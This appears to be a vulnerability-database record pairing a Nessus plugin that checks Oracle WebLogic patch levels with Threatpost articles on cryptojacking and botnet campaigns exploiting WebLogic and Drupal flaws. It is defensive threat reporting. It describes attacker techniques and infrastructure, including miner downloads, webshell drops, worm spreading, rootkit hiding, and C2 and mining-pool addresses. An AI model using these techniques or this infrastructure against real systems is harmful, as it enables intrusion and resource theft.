script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Weblogic Server Deserialization RCE - AsyncResponseService');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/17\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"Oracle WebLogic Server\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix = NULL;\nfix_ver = NULL;\n\n# individual security patches\nif (version =~ \"^10\\.3\\.6\\.\")\n{\n fix_ver = \"10.3.6.0.171017\";\n fix = \"26519424\";\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = \"12.1.3.0.171017\";\n fix = \"26519417\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.1($|[^0-9])\")\n{\n fix_ver = \"12.2.1.1.171017\";\n fix = \"26519400\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.2($|[^0-9])\")\n{\n fix_ver = \"12.2.1.2.171017\";\n fix = \"26485996\";\n}\n\nif (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if ('windows' >< tolower(os))\n {\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n }\n else port = 0;\n\n report =\n '\\n Oracle home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version +\n '\\n Required Patch : ' + fix +\n '\\n';\n security_report_v4(extra:report, 
port:port, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2019-05-30T05:51:17", "bulletinFamily": "info", "cvelist": ["CVE-2017-10271", "CVE-2017-3066"], "description": "Researchers are warning of a Chinese-language threat actor leveraging a wide array of Git repositories to infect vulnerable systems with Monero-based cryptomining malware.\n\nResearchers at Cisco Talos, who discovered the threat actor they call \u201cRocke\u201d, said they have been tracking the adversary since April as it continues to plant various Monero miners on vulnerable systems. Rocke\u2019s hallmark is the enlisting of toolkits that leverage Git repositories, HTTP File Servers (HFS) and a myriad of different payloads. The name Rocke was derived from the group\u2019s Monero wallet that includes \u201crocke@live.cn\u201d.\n\n\u201cRocke will continue to leverage Git repositories to download and execute illicit mining onto victim machines,\u201d the research team said in a [post](<https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html>) Thursday. \u201cIt is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware.\u201d\n\nCisco Talos said it first spotted the threat actor in April 2018 when its malware was found in both Western and Chinese honeypots attempting to exploit an Apache Struts vulnerability.\n\nA user named \u201cc-000\u201d first downloaded several files to the researchers\u2019 Struts 2 honeypot from the Chinese repository site (Gitee.com), researchers said. At the same time another user named \u201cc-18\u201d pulled down files in similar activity from a GitLab.com repository page. The repositories on both Gitee and GitLab were identical, leading researchers to determine they were the same actor. 
The repositories also contained similar files such as an array of ELF executables, shell scripts, and text files. Each executed a variety of Monero-based cryptocurrency miners.\n\n\u201cAfter months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors,\u201d wrote David Liebenberg, senior threat analyst, who authored the Cisco Talos report.\n\nResearchers said they found the same threat actor exploiting an Oracle WebLogic server vulnerability (CVE-2017-10271), and also exploiting a critical Java deserialization vulnerability in the Adobe ColdFusion platform (CVE-2017-3066).\n\n## Recent Campaigns\n\nAs recently as late July, researchers said they discovered another similar campaign on their Struts 2 honeypot. The honeypot received a wget request (a command for downloading files from the internet) for a file called \u201c0720.bin.\u201d When researchers did some digging and visited the host this file was located on, they discovered that it contained a slew of additional files, including shell scripts and cryptominers.\n\nThose files included an Executable and Linkable (ELF) file called \u201c3307.bin,\u201d a shell script called \u201ca7\u201d that kills a variety of processes related to other cryptomining malware, as well as shell scripts \u201clowerv2.sh\u201d and \u201crootv2.sh,\u201d which attempt to download and execute cryptomining malware.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/08/30151343/talos.png>)\n\nThey also found a file called \u201cconfig.json,\u201d which is a mining config file for open-source Monero miner XMRig. Another file, \u201cPools.txt,\u201d appears to be a config file for XMR-stak, an open-source universal Stratum pool miner that mines Monero, Aeon and more. 
Both miners have the same mining pool and wallet information.\n\nOther miners in the files include \u201cBashf,\u201d a variant of XMR-stak, and \u201cbashg,\u201d a variant of XMRig.\n\nFinally, Cisco Talos said it found a file dubbed \u201cTermsHost.exe,\u201d a PE 32 Monero miner, which researchers said can be purchased online for $14 and targets malicious actors: \u201cAdvertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \u2018Windows processes to bypass firewalls,'\u201d Liebenberg wrote.\n\nThe sample first grabs the config file \u201cxmr.txt\u201d containing the same configuration information as the previous files, from Rocke\u2019s command-and-control (C2) server, and then injects code into notepad.exe, which then proceeds to communicate with the MinerGate pool.\n\n\u201cIntriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system,\u201d researchers said.\n\n## Threat Actor\n\nLiebenberg said Cisco Talos was able to discover more about Rocke through several emails associated with the threat actor\u2019s MinerGate Monero wallet (rocke@live.cn and jxci@vip.qq.com): \u201cThe majority of websites registered to Rocke list Jiangxi Province addresses for their registration,\u201d he said. \u201cSome of these websites were for Jiangxi-based businesses, such as belesu[.]com, which sells baby food\u2026 It is possible that the \u2018jx\u2019 in jxci@vip.qq.com stands for Jiangxi. 
Therefore, we assess with high confidence that Rocke operates from Jiangxi Province.\u201d\n\nThe payload is similar to one used by the [Iron Cybercrime Group](<https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/>), Cisco Talos said: \u201cBoth Iron and Rocke\u2019s malware behave similarly, and reach out to similar infrastructure,\u201d they said. \u201cSo, while we can assess with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group.\u201d\n\nLiebenberg pointed to cryptomining malware as increasing in popularity, with the Rocke threat actor an example of varying methods to download and execute various malware.\n\n\u201cDespite the volatility in the value of various cryptocurrencies, the trend of illicit cryptocurrency mining activity among cybercriminals shows no signs of abating,\u201d they said. \u201cRocke\u2019s various campaigns show the variety of infection vectors, malware, and infrastructure that these criminals will employ to achieve their goals.\u201d\n", "modified": "2018-08-30T20:35:39", "published": "2018-08-30T20:35:39", "id": "THREATPOST:E43EB029B562B5665C8385E16145288A", "href": "https://threatpost.com/new-threat-actor-rocke-a-rising-monero-cryptomining-menace/137090/", "type": "threatpost", "title": "New Threat Actor \u2018Rocke\u2019: A Rising Monero Cryptomining Menace", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-11T11:47:52", "bulletinFamily": "info", "cvelist": ["CVE-2017-10271", "CVE-2019-2725"], "description": "Malicious activity exploiting the recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) is surging. 
Even though there\u2019s a patch, tens of thousands of vulnerable machines represent an irresistible target for hackers, according to Unit 42 researchers at Palo Alto Networks \u2013 especially since the bug is \u201ctrivial\u201d to exploit.\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. Oracle released an out-of-band patch on April 26, 2019 \u2013 though exploitation for what was then a zero-day had already begun, researchers said. Quickly thereafter, attacks distributing a never-before-seen [ransomware variant called \u201cSodinokibi\u201d emerged](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>); and then attacks [spreading a new variant](<https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/>) of the Muhstik botnet, which is used to launch distributed-denial-of-service (DDoS) and cryptojacking attacks.\n\nNow, other attacks are starting to snowball, with no sign of abating.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cOnce the vulnerability was made public with the release of the patch, numerous instances of proof-of-concept (PoC) code exploiting the vulnerability were released,\u201d Unit 42 researchers said, in a posting [late last week](<https://unit42.paloaltonetworks.com/attackers-increasingly-targeting-oracle-weblogic-server-vulnerability-for-xmrig-and-ransomware/>). 
\u201cPreliminary indicators reveal over 600 exploitation attempts targeting CVE-2019-2725 on Palo Alto Networks soak sites and we expect this number to increase rapidly.\u201d\n\nThey added that a scan showed more than 41,000 publicly accessible WebLogic instances in the wild.\n\n\u201cWith this many publicly available WebLogic instances on the internet, as well as an unknown number of private instances in enterprise environments, we expect an escalation of exploitation attempts in the coming days and weeks,\u201d according to the researchers.\n\nThe critical flaw, which has a CVSS score of 9.8, is a remote code execution bug that is remotely exploitable without authentication. Impacted are versions 10.3.6.0.0 and 12.1.3.0.0 of the product. Palo Alto pointed out that exploitation does not require any interaction from the user \u2013 a remote, unauthenticated user can send an HTTP request containing a crafted SOAP payload and obtain remote code execution trivially.\n\n\u201cPeople are on the lookout for critical vulnerabilities and seek to jump on them quickly so they can exploit them before patches are applied,\u201d Ryan Olson, vice president of threat intelligence for Unit 42 told Threatpost. 
\u201cAs we outline in the blog, this isn\u2019t a difficult vulnerability to exploit, particularly given its similarity to a previous vulnerability from 2017.\u201d\n\nThat previous vulnerability (CVE-2017-10271) allows a remote, unauthenticated attacker to pass Java-class objects with arbitrary contents, allowing for remote code-execution and in many ways provides a blueprint for the new flaw, according to the researchers.\n\n\u201cThis reinforces the importance of good testing for variant vulnerabilities by vendors when patching vulnerabilities,\u201d Olson told Threatpost.\n\n## XMRig and GandCrab\n\nUnit 42 researchers have observed a wide variety of payloads in addition to Muhstik and Sodinokibi, such as a PowerShell loader that fetches the open-source Monero cryptominer known as XMRig. In addition to dropping the miner, it terminates any legitimate Oracle update services that would patch the underlying WebLogic vulnerability, and establishes persistence by copying itself and creating a scheduled task that masquerades as the Oracle update service.\n\nOther attacks are pushing ransomware to infected victims, including [the infamous GandCrab](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>).\n\n\u201cAt this point, it appears that both ransomware and cryptomining have settled into a stable pattern in terms of use by cybercriminals,\u201d Olson told Threatpost.\n\nThe popularity of WebLogic Server, combined with its tendency to be deployed in business-critical environments, creates an attractive target set for cybercriminals; and exacerbating matters is the fact that there could be \u201can unknown number of private instances in enterprise environments,\u201d Unit 42 researchers said. These are not directly exposed to the web, but an attacker that\u2019s able to penetrate a corporate network could easily uncover them.\n\n\u201cThese would essentially be internal network deployments,\u201d Olson said. 
\u201cThe attacks wouldn\u2019t be different, but the attackers would have to find a means to launch the attack so that it gets into the internal network.\u201d\n\nBusinesses should make every effort to patch, and patch quickly, Olson noted.\n\n\u201cThis is a reminder that the window for exploitation has narrowed and that enterprises need to be able to deploy critical patches like this in a matter of hours and days, not weeks and months,\u201d he told Threatpost.\n", "modified": "2019-05-06T20:04:55", "published": "2019-05-06T20:04:55", "id": "THREATPOST:760547BA8017A91CB7219FE7629E28B3", "href": "https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/", "type": "threatpost", "title": "Oracle WebLogic Exploit-fest Continues with GandCrab Ransomware, XMRig", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:50:10", "bulletinFamily": "info", "cvelist": ["CVE-2017-10271", "CVE-2018-7600"], "description": "Researchers are warning a recently discovered and highly critical vulnerability found in Drupal\u2019s CMS platform is now being actively exploited by hackers who are using it to install cryptocurrency miners and to launch DDoS attacks via compromised systems. At the time of the disclosure, last month, researchers said they were not aware of any public exploits.\n\nNow Netlab 360 researchers say they have identified a botnet, dubbed Muhstik, that is taking advantage of the Drupal bug. They said multiple scans on infected Drupal instances reveal[ attackers](<https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/>) are exploiting the vulnerability by accessing a URL and then injecting exploit code. 
The technique allows adversaries to execute commands on targeted servers running Drupal.\n\nThe Muhstik botnet exploits Drupal vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), impacting versions 6, 7, and 8 of Drupal\u2019s CMS platform. \u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned MITRE\u2019s Common Vulnerabilities and Exposures bulletin on March 28.\n\nDrupal, which also released a patch for the vulnerability in [March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), warned that over one million sites running Drupal are impacted. Unprivileged and untrusted attackers could also modify or delete data hosted on affected CMS platforms, Drupal said.\n\nAfter further investigations, Netlab researchers said they believe at least three groups of malware were exploiting the vulnerability.\n\n\u201cWe noticed one of them has worm-propagation behavior. After investigation, we believe this botnet has been active for quite a time. We name it Muhstik, for this keyword keeps popping up in its binary file name and the communication IRC channel,\u201d wrote Netlab 360 researchers.\n\nAccording to Netlab, Muhstik is a variant of Tsunami, a malware strain that creates botnets with infected Linux servers and Linux-based IoT devices.\n\nMuhstik has the capability to install two coinminers \u2013 XMRig (XMR) and CGMiner \u2013 to mine the open-source, peer-to-peer Dash cryptocurrency, according to Netlab.\n\nResearchers say the botnet uses the open-source XMRig utility to mine cryptocurrency with a self-built mining pool (47.135.208.145:4871). 
Meanwhile, it uses popular mining software CGMiner to dig cryptocurrency coins using multiple mining tools (with username reborn.D3), they said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/04/23162156/Botnet.png>)\n\nIn addition, Netlab researchers said they intercepted multiple DDoS attack instructions targeting the IP address 46[.]243[.]189[.]102.\n\nMuhstik relies on 11 command and control domains and IP addresses, and the attackers also use the IRC communication protocol to invoke commands for the botnet: \u201cWe observed multiple IRC Channels, all starting with \u2018muhstik,'\u201d said Netlab researchers in a report. \u201cAt present, we can not confirm which specific channels are open on which C2 server. This is due to the characteristics of the IRC protocol itself. Only when we receive a communication instruction from the corresponding channel can we confirm it\u2019s present.\u201d\n\nMuhstik also has capabilities to scan for vulnerable server apps using the aiox86 scanning module. 
This module \u201cscans TCP port 80, 8080, 7001, 2004, and tries varieties of different payloads on each port,\u201d according to NetLab.\n\nGreyNoise Intelligence said in a tweet that it detected the botnet to be exploiting a vulnerability (CVE-2017-10271) in Oracle WebLogic Server as well, indicating that Muhstik is exploiting vulnerabilities in other server applications.\n\n> UPDATE: there is a 95% overlap between the IPs scanning for the previously reported [#drupalgeddon](<https://twitter.com/hashtag/drupalgeddon?src=hash&ref_src=twsrc%5Etfw>) vulnerability and the Oracle CVE-2017-10271 vulnerability.\n> \n> \u2014 GreyNoise Intelligence (@GreyNoiseIO) [April 18, 2018](<https://twitter.com/GreyNoiseIO/status/986458691787517952?ref_src=twsrc%5Etfw>)\n\nTroy Mursch, founder of Bad Packets Report, told Threatpost that given the criticality of the exploit and the repercussions once it\u2019s used, \u201cthe race is on to find vulnerable Drupal installations.\u201d\n\n\u201cI recommend affected users update to Drupal 7.58 or 8.5.1 as soon as possible. To note as well, updating to the patched version doesn\u2019t retroactively \u2018unhack\u2019 your site. 
I recommend website operators check their installation (server) for any of the IoCs mentioned in the 360 Netlab report after completing the update,\u201d he said.\n", "modified": "2018-04-23T22:13:25", "published": "2018-04-23T22:13:25", "id": "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "href": "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/", "type": "threatpost", "title": "Muhstik Botnet Exploits Highly Critical Drupal Bug", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-01-28T21:55:45", "bulletinFamily": "info", "cvelist": ["CVE-2016-3088", "CVE-2017-10271", "CVE-2018-2893"], "description": "Researchers have identified an updated malware variant used by the cybercrime gang Rocke Group that targets cloud infrastructures with crypto-jacking attacks.\n\nThe malware is called Pro-Ocean, which was first discovered in 2019, and has now been beefed-up with \u201cworm\u201d capabilities and rootkit detection-evasion features.\n\n\u201cThis malware is an example that demonstrates that cloud providers\u2019 agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure,\u201d said Aviv Sasson with Palo Alto Networks [on Thursday](<https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/>). \u201cAs we saw, this sample has the capability to delete some cloud providers\u2019 agents and evade their detection.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nSince [its discovery in 2018](<https://threatpost.com/new-threat-actor-rocke-a-rising-monero-cryptomining-menace/137090/>), the Rocke Group has widened its [targeting of cloud applications](<https://threatpost.com/cryptomining-malware-uninstalls-cloud-security-products/140959/>) \u2013 including Apache ActiveMQ, Oracle WebLogic and open-source data structure store Redis \u2013 for mining Monero. 
Researchers say that since these attacks initially broke out, many cybersecurity companies have kept Pro-Ocean on their radar. Rocke Group\u2019s latest update aims to sidestep these detection and mitigation efforts.\n\n## **Pro-Ocean Malware**\n\nPro-Ocean uses a variety of known vulnerabilities to target cloud applications. These include a [critical flaw in Apache ActiveMQ](<https://nvd.nist.gov/vuln/detail/CVE-2016-3088>) (CVE-2016-3088) and [a high-severity vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>) in Oracle WebLogic (CVE-2017-10271). The malware has also been spotted targeting unsecure instances of Redis.\n\nOnce downloaded, the malware attempts to remove other malware and cryptominers, including [Luoxk](<https://blog.netlab.360.com/malicious-campaign-luoxk-is-actively-exploiting-cve-2018-2893/>), [BillGates](<https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf>), [XMRig](<https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/>) and [Hashfish](<https://virus-removal-guide.net/34710-is-the-hashfish-exe-file-legal-how-to-remove-hashfish-exe-trojan-coinminer/>). It then kills any processes using the CPU heavily, so that its XMRig miner can utilize 100 percent of the CPU juice needed to sow Monero.\n\nThe malware is made up of four components: A rootkit module that installs a rootkit and other various malicious services; a mining module that runs the XMRig miner; a Watchdog module that executes two Bash scripts (these check that the malware is running and search any processes using CPU heavily); and an infection module that contains \u201cworm\u201d capabilities.\n\n## **New Features**\n\nThe latter \u201cworm\u201d feature is a new add for Pro-Ocean, which previously only infected victims manually. The malware now uses a Python infection script to retrieve the public IP address of the victim\u2019s machine. 
It does so by accessing an online service with the address \u201cident.me,\u201d which scopes out IP addresses for various web servers. Then, the script tries to infect all the machines in the same 16-bit subnet (e.g. 10.0.X.X).\n\n\u201cIt does this by blindly executing public exploits one after the other in the hope of finding unpatched software it can exploit,\u201d said Sasson.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/01/28143636/word-image-4.png>)\n\nPro-Ocean\u2019s modular structure. Credit: Palo Alto Networks\n\nOther threat groups have previously adopted worm-like functionality into their Monero-chugging malware. TeamTNT\u2019s cryptomining worm, for instance, [was found spreading through](<https://threatpost.com/aws-cryptojacking-worm-cloud/158427/>) the Amazon Web Services (AWS) cloud and collecting credentials in August.\n\nThe Pro-Ocean malware has also added new rootkit capabilities that cloak its malicious activity.\n\nThese updated features exist in [Libprocesshider](<https://github.com/gianlucaborello/libprocesshider>), a library for hiding processes used by the malware. 
This library was utilized by previous versions of Pro-Ocean \u2013 however, in the new version, the developer of the code has added several new code snippets to the library for further functionalities.\n\nFor example, before calling the libc function open (libc is a library of standard functions that can be used by all C programs), a malicious function determines whether the file needs to be hidden to obfuscate malicious activities.\n\n\u201cIf it determines that the file needs to be hidden, the malicious function will return a \u2018No such file or directory\u2019 error, as if the file in question does not exist,\u201d said Sasson.\n\nResearchers said they believe that the Rocke Group will continue to actively update its malware, particularly as the [cloud grows as a lucrative target for attackers](<https://threatpost.com/cloud-attacks-bypass-mfa-feds/163056/>).\n\n\u201cCryptojacking malware targeting the cloud is evolving as attackers understand the potential of that environment to mine for crypto coins. We previously saw simpler attacks by the Rocke Group, but it seems this group presents an ongoing, growing threat. This cloud-targeted malware is not something ordinary since it has worm and rootkit capabilities. We can assume that the growing trend of sophisticated attacks on the cloud will continue.\u201d\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) [_**Healthcare Security Woes Balloon in a Covid-Era World**_](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** , sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. 
Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)**\u2013 on us!**\n", "modified": "2021-01-28T20:06:57", "published": "2021-01-28T20:06:57", "id": "THREATPOST:D3FA06D667A0B326C1598C8BCD106E7D", "href": "https://threatpost.com/rocke-groups-malware-now-has-worm-capabilities/163463/", "type": "threatpost", "title": "Rocke Group\u2019s Malware Now Has Worm Capabilities", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-08T11:51:46", "bulletinFamily": "info", "cvelist": ["CVE-2017-10271", "CVE-2019-2725", "CVE-2020-0688"], "description": "UPDATE\n\nA variant of the Muhstik botnet has been uncovered in the wild, exploiting a recently-disclosed, dangerous vulnerability in Oracle WebLogic servers.\n\nThe newfound samples of Muhstik are targeting the [recently-patched CVE-2019-2725](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) in WebLogic servers, and then launching distributed-denial-of-service (DDoS) and cryptojacking attacks with the aim of making money for the attacker behind the botnet, researchers said.\n\n\u201cFrom the timeline, we can see that the developer of Muhstik watches aggressively for new Linux service vulnerability exploits and takes immediate action to [incorporate] exploits against them into the botnet,\u201d Cong Zheng and Yanhui Jia, researchers with Palo Alto Network\u2019s Unit 42 team, said in a [Tuesday analysis](<https://unit42.paloaltonetworks.com/muhstik-botnet-exploits-the-latest-weblogic-vulnerability-for-cryptomining-and-ddos-attacks/>). 
\u201cThis makes sense, because the faster the botnet includes the new exploits, the greater chance of successfully using the vulnerability to harvest more bots before systems are patched.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nOracle WebLogic is a popular server used for building and deploying enterprise applications. The server\u2019s flaw ([CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>)), meanwhile, has a CVSS score of 9.8 and is a remote code-execution (RCE) bug that is exploitable without authentication. Oracle patched the flaw on April 26.\n\nHowever, researchers first observed exploit traffic for the WebLogic vulnerability coming from three new Muhstik samples on April 28. Muhstik, which has been around since March 2018 and has wormlike self-propagating capabilities, is known to compromise Linux servers and IoT devices, and then launch cryptocurrency mining software and DDoS attacks.\n\nThey saw the exploit traffic being sent from the IP address 165.227.78[.]159, which was transmitting one shell command, to download a PHP webshell.\n\nInterestingly, that IP address (165.227.78[.]159) has previously been used by the Muhstik botnet as a mere reporting server to collect information on bots \u2013 but now, the IP address appears to also be used as a payload host server.\n\nThe discovery shows that new samples of the Muhstik botnet continue to sniff out ripe exploits. 
The botnet had previously targeted an earlier WebLogic vulnerability ([CVE-2017-10271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271>)), as well as WordPress and [Drupal vulnerabilities.](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>)\n\nUnit 42 researchers told Threatpost that they didn\u2019t have further information on the number of servers impacted.\n\n## Oracle WebLogic\n\nThe latest Oracle WebLogic flaw, which impacts versions 10.3.6 and 12.1.3 of the server, is one such ripe target.\n\nThe flaw could allow an attacker to send a request to a WebLogic server, which would then reach out to a malicious host to complete the request, opening up the impacted server to an remote code-execution attack.\n\nOracle for its part is urging users to update as soon as possible. \u201cDue to the severity of this vulnerability, Oracle recommends that this Security Alert be applied as soon as possible,\u201d Eric Maurice, director of security assurance at Oracle, said in a [recent post](<https://blogs.oracle.com/security/security-alert-cve-2019-2725-released>) about the vulnerability.\n\nOracle didn\u2019t respond to a request for further comment from Threatpost.\n\nHowever, servers that haven\u2019t yet updated are being targeted by several other bad actors, including ones spreading a new [ransomware variant](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) uncovered this week called \u201cSodinokibi.\u201d That ransomware first came onto researchers\u2019 radar on April 25 (the day before a patch was released), after attackers attempted to make an HTTP connection with vulnerable Oracle WebLogic servers.\n\nResearchers for their part warn of a slew of scans checking for the Oracle WebLogic vulnerability, and urge users to update their devices as soon as possible.\n\nhttps://twitter.com/bad_packets/status/1122356384849248258\n\nWhen it comes to Muhstik, Unit 42 researchers 
said that adding this latest exploit to the botnet\u2019s toolkit will increase the number of systems it can infect.\n\n\u201cThe Oracle WebLogic wls9-async RCE vulnerability is now being used by Muhstik botnet in the wild and there is a great possibility that it will be exploited by other malware families in the future,\u201d they said. \u201cUnder the pressure of racing with botnets, both service vendors and users should address new vulnerabilities by releasing patches and installing them respectively.\u201d\n\n_This article was updated on May 2 at 8 am ET to reflect Unit 42 comments._\n", "modified": "2019-05-01T14:11:11", "published": "2019-05-01T14:11:11", "id": "THREATPOST:420EE567E806D93092741D7BB375AC57", "href": "https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/", "type": "threatpost", "title": "Muhstik Botnet Variant Targets Just-Patched Oracle WebLogic Flaw", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-02-17T21:39:31", "bulletinFamily": "info", "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271"], "description": "Cryptocurrency-mining malware, called WatchDog, has been running under the radar for more than two years \u2013 in what researchers call one of the largest and longest-lasting Monero cryptojacking attacks to date.\n\n[](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)\n\nClick to Register\n\nThe attack is still in operation as of this writing \u2013 and due to the size and scope of the infrastructure, it will be difficult to fully contain, researchers told Threatpost. 
Thus far, attackers have hijacked at least 476 Windows and Linux devices, in order to abuse their system resources for mining Monero cryptocurrency.\n\nRight now, the attackers behind this campaign are sticking to cryptojacking \u2013 but researchers warn that it is \u201chighly likely\u201d they could find identity and access management (IAM) data on previously-compromised cloud systems, due to the root and administrative access that\u2019s acquired during the malware implantation. This could open the door for future \u2013 and more dangerous \u2013 attacks.\n\n\u201cIt is clear that the WatchDog operators are skilled coders and have enjoyed a relative lack of attention regarding their mining operations,\u201d said researchers with Palo Alto Networks [on Wednesday](<https://unit42.paloaltonetworks.com/watchdog-cryptojacking/>). \u201cWhile there is currently no indication of additional cloud compromising activity at present (i.e. the capturing of cloud platform identity and access management credentials, access ID or keys), there could be potential for further cloud account compromise.\u201d\n\n## **How Much Money Does Cryptomining Malware Make? **\n\nThe attack is a [prime example of cryptojacking](<https://threatpost.com/cryptojacking-attack-found-on-los-angeles-times-website/130041/>), which is when attackers leverage malicious cryptomining for financial profit. They do so by hacking into devices to install software, which then uses the devices\u2019 power and resources to mine for cryptocurrencies or to steal cryptocurrency wallets owned by the victims.\n\nSince it launched on Jan. 27, 2019, the WatchDog mining operation has collected at least 209 Monero cryptocurrency coins (XMR) \u2013 which is currently valued at $32,056. 
While this figure appears to be relatively low, the important piece of cryptojacking operations is not the immediate market price, but the total XMR mined, Nathaniel Quist, senior cloud threat researcher for Unit 42 at Palo Alto Networks, told Threatpost.\n\nAt the time of writing the research, the market price for Monero was $153. But, just within the last 24 hours, the market price of XMR has soared to $254, Quist explained \u2013 so as of Wednesday, WatchDog has actually collected $53,086.\n\n\u201cIn the past, we have seen dramatic swings in cryptocurrency valuations,\u201d Quist told Threatpost. \u201cDepending upon the market price over the next months, we could see cryptocurrency market prices touch the record highs that were seen back in early 2018, where Monero was valued at $469. If that were the case, WatchDog could increase its value total to $98,021 without mining another coin, making it a very profitable mining operation.\u201d\n\n## **WatchDog Malware: Go Binaries Drive Functionality**\n\nResearchers said, the WatchDog mining malware is composed of a three-part Go Language binary set and a bash or PowerShell script file. Go, an open-source programming language, has previously been utilized by various cybercriminals for various cryptojacking attacks, [including TeamTNT](<https://threatpost.com/blackt-cryptojacker-teamtnt/159853/>) and [the developers of ElectroRAT](<https://threatpost.com/electrorat-drains-cryptocurrency-wallet-funds-of-thousands/162705/>).\n\nWatchDog\u2019s Go binaries each perform a specific functionality \u2013 including one that emulates the Linux watchdog daemon functionality (hence the name of the malware, WatchDog) by ensuring that the mining process does not overload or stop unexpectedly. 